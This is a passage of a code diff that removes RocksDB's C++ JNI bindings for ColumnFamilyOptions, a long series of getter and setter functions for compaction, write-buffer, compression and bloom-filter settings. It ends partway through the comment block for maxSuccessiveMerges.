- * Method:    optimizeLevelStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeLevelStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeLevelStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    optimizeUniversalStyleCompaction
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_optimizeUniversalStyleCompaction(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong memtable_memory_budget) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      OptimizeUniversalStyleCompaction(memtable_memory_budget);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setComparatorHandle
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setComparatorHandle__JI(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint builtinComparator) {
-  switch (builtinComparator) {
-    case 1:
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->comparator =
-          rocksdb::ReverseBytewiseComparator();
-      break;
-    default:
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->comparator =
-          rocksdb::BytewiseComparator();
-      break;
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setComparatorHandle
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setComparatorHandle__JJ(
-    JNIEnv* env, jobject jobj, jlong jopt_handle, jlong jcomparator_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jopt_handle)->comparator =
-      reinterpret_cast<rocksdb::Comparator*>(jcomparator_handle);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMergeOperatorName
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMergeOperatorName(
-    JNIEnv* env, jobject jobj, jlong jhandle, jstring jop_name) {
-  auto* options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  const char* op_name = env->GetStringUTFChars(jop_name, nullptr);
-  if(op_name == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return;
-  }
-
-  options->merge_operator =
-      rocksdb::MergeOperators::CreateFromStringId(op_name);
-  env->ReleaseStringUTFChars(jop_name, op_name);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMergeOperator
- * Signature: (JJjava/lang/String)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMergeOperator(
-  JNIEnv* env, jobject jobj, jlong jhandle, jlong mergeOperatorHandle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->merge_operator =
-    *(reinterpret_cast<std::shared_ptr<rocksdb::MergeOperator>*>
-      (mergeOperatorHandle));
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionFilterHandle
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionFilterHandle(
-    JNIEnv* env, jobject jobj, jlong jopt_handle,
-    jlong jcompactionfilter_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jopt_handle)->
-      compaction_filter = reinterpret_cast<rocksdb::CompactionFilter*>
-        (jcompactionfilter_handle);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setWriteBufferSize
- * Signature: (JJ)I
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setWriteBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jwrite_buffer_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jwrite_buffer_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        write_buffer_size = jwrite_buffer_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    writeBufferSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_writeBufferSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      write_buffer_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxWriteBufferNumber
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jmax_write_buffer_number) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      max_write_buffer_number = jmax_write_buffer_number;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxWriteBufferNumber
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_maxWriteBufferNumber(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      max_write_buffer_number;
-}
-
-/*
- * Method:    setMemTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMemTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      memtable_factory.reset(
-      reinterpret_cast<rocksdb::MemTableRepFactory*>(jfactory_handle));
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    memTableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_ColumnFamilyOptions_memTableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  rocksdb::MemTableRepFactory* tf = opt->memtable_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  // temporarly fix for the historical typo
-  if (strcmp(tf->Name(), "HashLinkListRepFactory") == 0) {
-    return env->NewStringUTF("HashLinkedListRepFactory");
-  }
-
-  return env->NewStringUTF(tf->Name());
-}
-
-/*
- * Method:    useFixedLengthPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_useFixedLengthPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Method:    useCappedPrefixExtractor
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_useCappedPrefixExtractor(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jprefix_length) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      prefix_extractor.reset(rocksdb::NewCappedPrefixTransform(
-          static_cast<int>(jprefix_length)));
-}
-
-/*
- * Method:    setTableFactory
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setTableFactory(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jfactory_handle) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      table_factory.reset(reinterpret_cast<rocksdb::TableFactory*>(
-      jfactory_handle));
-}
-
-/*
- * Method:    tableFactoryName
- * Signature: (J)Ljava/lang/String
- */
-jstring Java_org_rocksdb_ColumnFamilyOptions_tableFactoryName(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* opt = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  rocksdb::TableFactory* tf = opt->table_factory.get();
-
-  // Should never be nullptr.
-  // Default memtable factory is SkipListFactory
-  assert(tf);
-
-  return env->NewStringUTF(tf->Name());
-}
-
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    minWriteBufferNumberToMerge
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_minWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->min_write_buffer_number_to_merge;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMinWriteBufferNumberToMerge
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMinWriteBufferNumberToMerge(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmin_write_buffer_number_to_merge) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->min_write_buffer_number_to_merge =
-          static_cast<int>(jmin_write_buffer_number_to_merge);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxWriteBufferNumberToMaintain
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_maxWriteBufferNumberToMaintain(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_write_buffer_number_to_maintain;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxWriteBufferNumberToMaintain
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxWriteBufferNumberToMaintain(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jmax_write_buffer_number_to_maintain) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_write_buffer_number_to_maintain =
-      static_cast<int>(jmax_write_buffer_number_to_maintain);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_opts->compression = rocksdb::CompressionTypeJni::toCppCompressionType(
-      jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_compressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_opts = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      cf_opts->compression);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompressionPerLevel
- * Signature: (J[B)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jbyteArray jcompressionLevels) {
-  auto* options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto uptr_compression_levels =
-      rocksdb_compression_vector_helper(env, jcompressionLevels);
-  if(!uptr_compression_levels) {
-      // exception occurred
-      return;
-  }
-  options->compression_per_level = *(uptr_compression_levels.get());
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compressionPerLevel
- * Signature: (J)[B
- */
-jbyteArray Java_org_rocksdb_ColumnFamilyOptions_compressionPerLevel(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb_compression_list_helper(env,
-      cf_options->compression_per_level);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setBottommostCompressionType
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setBottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte jcompression_type_value) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  cf_options->bottommost_compression =
-      rocksdb::CompressionTypeJni::toCppCompressionType(
-          jcompression_type_value);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    bottommostCompressionType
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_bottommostCompressionType(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  return rocksdb::CompressionTypeJni::toJavaCompressionType(
-      cf_options->bottommost_compression);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompressionOptions
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompressionOptions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jcompression_options_handle) {
-  auto* cf_options = reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle);
-  auto* compression_options =
-    reinterpret_cast<rocksdb::CompressionOptions*>(jcompression_options_handle);
-  cf_options->compression_opts = *compression_options;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setCompactionStyle
- * Signature: (JB)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setCompactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle, jbyte compaction_style) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->compaction_style =
-      static_cast<rocksdb::CompactionStyle>(compaction_style);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    compactionStyle
- * Signature: (J)B
- */
-jbyte Java_org_rocksdb_ColumnFamilyOptions_compactionStyle(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>
-      (jhandle)->compaction_style;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxTableFilesSizeFIFO
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_table_files_size) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->compaction_options_fifo.max_table_files_size =
-    static_cast<uint64_t>(jmax_table_files_size);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxTableFilesSizeFIFO
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxTableFilesSizeFIFO(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->compaction_options_fifo.max_table_files_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    numLevels
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_numLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->num_levels;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setNumLevels
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setNumLevels(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jnum_levels) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->num_levels =
-      static_cast<int>(jnum_levels);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelZeroFileNumCompactionTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_levelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_file_num_compaction_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelZeroFileNumCompactionTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelZeroFileNumCompactionTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_file_num_compaction_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_file_num_compaction_trigger =
-          static_cast<int>(jlevel0_file_num_compaction_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelZeroSlowdownWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_levelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_slowdown_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelSlowdownWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelZeroSlowdownWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_slowdown_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_slowdown_writes_trigger =
-          static_cast<int>(jlevel0_slowdown_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelZeroStopWritesTrigger
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_levelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level0_stop_writes_trigger;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelStopWritesTrigger
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelZeroStopWritesTrigger(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jlevel0_stop_writes_trigger) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      level0_stop_writes_trigger = static_cast<int>(
-      jlevel0_stop_writes_trigger);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    targetFileSizeBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_targetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      target_file_size_base;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setTargetFileSizeBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setTargetFileSizeBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jtarget_file_size_base) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      target_file_size_base = static_cast<uint64_t>(jtarget_file_size_base);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    targetFileSizeMultiplier
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_targetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->target_file_size_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setTargetFileSizeMultiplier
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setTargetFileSizeMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jint jtarget_file_size_multiplier) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->target_file_size_multiplier =
-          static_cast<int>(jtarget_file_size_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxBytesForLevelBase
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_base;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxBytesForLevelBase
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxBytesForLevelBase(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_bytes_for_level_base) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_base =
-          static_cast<int64_t>(jmax_bytes_for_level_base);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    levelCompactionDynamicLevelBytes
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_levelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level_compaction_dynamic_level_bytes;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setLevelCompactionDynamicLevelBytes
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setLevelCompactionDynamicLevelBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jenable_dynamic_level_bytes) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->level_compaction_dynamic_level_bytes =
-          (jenable_dynamic_level_bytes);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxBytesForLevelMultiplier
- * Signature: (J)D
- */
-jdouble Java_org_rocksdb_ColumnFamilyOptions_maxBytesForLevelMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_bytes_for_level_multiplier;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxBytesForLevelMultiplier
- * Signature: (JD)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxBytesForLevelMultiplier(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmax_bytes_for_level_multiplier) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_bytes_for_level_multiplier =
-      static_cast<double>(jmax_bytes_for_level_multiplier);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxCompactionBytes
- * Signature: (J)I
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxCompactionBytes(JNIEnv* env,
-                                                              jobject jobj,
-                                                              jlong jhandle) {
-  return static_cast<jlong>(
-      reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-          ->max_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxCompactionBytes
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxCompactionBytes(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jmax_compaction_bytes) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->max_compaction_bytes = static_cast<uint64_t>(jmax_compaction_bytes);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    arenaBlockSize
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_arenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      arena_block_size;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setArenaBlockSize
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setArenaBlockSize(
-    JNIEnv* env, jobject jobj, jlong jhandle, jlong jarena_block_size) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(jarena_block_size);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        arena_block_size = jarena_block_size;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    disableAutoCompactions
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_disableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->disable_auto_compactions;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setDisableAutoCompactions
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setDisableAutoCompactions(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jdisable_auto_compactions) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->disable_auto_compactions =
-          static_cast<bool>(jdisable_auto_compactions);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxSequentialSkipInIterations
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_maxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_sequential_skip_in_iterations;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMaxSequentialSkipInIterations
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMaxSequentialSkipInIterations(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jmax_sequential_skip_in_iterations) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->max_sequential_skip_in_iterations =
-          static_cast<int64_t>(jmax_sequential_skip_in_iterations);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    inplaceUpdateSupport
- * Signature: (J)Z
- */
-jboolean Java_org_rocksdb_ColumnFamilyOptions_inplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->inplace_update_support;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setInplaceUpdateSupport
- * Signature: (JZ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setInplaceUpdateSupport(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jboolean jinplace_update_support) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->inplace_update_support =
-          static_cast<bool>(jinplace_update_support);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    inplaceUpdateNumLocks
- * Signature: (J)J
- */
-jlong Java_org_rocksdb_ColumnFamilyOptions_inplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(
-      jhandle)->inplace_update_num_locks;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setInplaceUpdateNumLocks
- * Signature: (JJ)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setInplaceUpdateNumLocks(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jlong jinplace_update_num_locks) {
-  rocksdb::Status s = rocksdb::check_if_jlong_fits_size_t(
-      jinplace_update_num_locks);
-  if (s.ok()) {
-    reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-        inplace_update_num_locks = jinplace_update_num_locks;
-  } else {
-    rocksdb::IllegalArgumentExceptionJni::ThrowNew(env, s);
-  }
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    memtablePrefixBloomSizeRatio
- * Signature: (J)I
- */
-jdouble Java_org_rocksdb_ColumnFamilyOptions_memtablePrefixBloomSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setMemtablePrefixBloomSizeRatio
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setMemtablePrefixBloomSizeRatio(
-    JNIEnv* env, jobject jobj, jlong jhandle,
-    jdouble jmemtable_prefix_bloom_size_ratio) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)
-      ->memtable_prefix_bloom_size_ratio =
-      static_cast<double>(jmemtable_prefix_bloom_size_ratio);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    bloomLocality
- * Signature: (J)I
- */
-jint Java_org_rocksdb_ColumnFamilyOptions_bloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle) {
-  return reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->
-      bloom_locality;
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    setBloomLocality
- * Signature: (JI)V
- */
-void Java_org_rocksdb_ColumnFamilyOptions_setBloomLocality(
-    JNIEnv* env, jobject jobj, jlong jhandle, jint jbloom_locality) {
-  reinterpret_cast<rocksdb::ColumnFamilyOptions*>(jhandle)->bloom_locality =
-      static_cast<int32_t>(jbloom_locality);
-}
-
-/*
- * Class:     org_rocksdb_ColumnFamilyOptions
- * Method:    maxSuccessiveMerges
- * Signature: (J)J
- */
